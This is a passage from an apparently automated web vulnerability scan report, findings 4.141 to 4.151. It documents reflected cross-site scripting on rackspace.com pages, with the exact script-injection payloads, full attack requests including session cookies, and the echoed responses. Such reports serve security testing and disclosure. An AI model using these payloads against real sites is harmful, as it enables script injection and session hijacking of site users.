<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.141. http://www.rackspace.com/information/events/green.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/green.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a03c6"><script>alert(1)</script>892efc84f3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /information/events/green.php?a03c6"><script>alert(1)</script>892efc84f3b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/green/index.php?a03c6"><script>alert(1)</script>892efc84f3b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.142. http://www.rackspace.com/information/events/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad42"><script>alert(1)</script>e58f97036b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/index.php?7ad42"><script>alert(1)</script>e58f97036b2=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/index.php?7ad42"><script>alert(1)</script>e58f97036b2=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.143. http://www.rackspace.com/information/events/rackgivesback.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/rackgivesback.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d2a"><script>alert(1)</script>38b6eea6844 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/rackgivesback.php?c3d2a"><script>alert(1)</script>38b6eea6844=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/rackgivesback.php?c3d2a"><script>alert(1)</script>38b6eea6844=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.144. http://www.rackspace.com/information/hosting101/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/hosting101/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 866e4"><script>alert(1)</script>04bceca55eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/hosting101/index.php?866e4"><script>alert(1)</script>04bceca55eb=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... click="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/hosting101/index.php?866e4"><script>alert(1)</script>04bceca55eb=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.145. http://www.rackspace.com/information/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b7c8"><script>alert(1)</script>a5a645fcc81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/index.php?8b7c8"><script>alert(1)</script>a5a645fcc81=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/index.php?8b7c8"><script>alert(1)</script>a5a645fcc81=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.146. http://www.rackspace.com/information/legal/clouddriveterms.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/legal/clouddriveterms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6903a"><script>alert(1)</script>2d1194f3a9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/clouddriveterms.php?6903a"><script>alert(1)</script>2d1194f3a9e=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/clouddriveterms.php?6903a"><script>alert(1)</script>2d1194f3a9e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.147. http://www.rackspace.com/information/legal/generalterms.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/legal/generalterms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8ea9"><script>alert(1)</script>7d1376fa0d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/generalterms.php?c8ea9"><script>alert(1)</script>7d1376fa0d0=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/generalterms.php?c8ea9"><script>alert(1)</script>7d1376fa0d0=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.148. http://www.rackspace.com/information/legal/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/legal/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a89"><script>alert(1)</script>0d45bdf3fa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/index.php?d3a89"><script>alert(1)</script>0d45bdf3fa5=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/index.php?d3a89"><script>alert(1)</script>0d45bdf3fa5=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.149. http://www.rackspace.com/information/legal/mailterms.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/legal/mailterms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40e3"><script>alert(1)</script>d6704c63428 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/mailterms.php?b40e3"><script>alert(1)</script>d6704c63428=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... nclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/mailterms.php?b40e3"><script>alert(1)</script>d6704c63428=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.150. http://www.rackspace.com/information/legal/privacystatement.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/legal/privacystatement.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0700"><script>alert(1)</script>997b906ae68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/privacystatement.php?d0700"><script>alert(1)</script>997b906ae68=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/privacystatement.php?d0700"><script>alert(1)</script>997b906ae68=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.151. http://www.rackspace.com/information/legal/sharepointappterms.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspace.com
Path: /information/legal/sharepointappterms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dec61"><script>alert(1)</script>f5b590d92a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
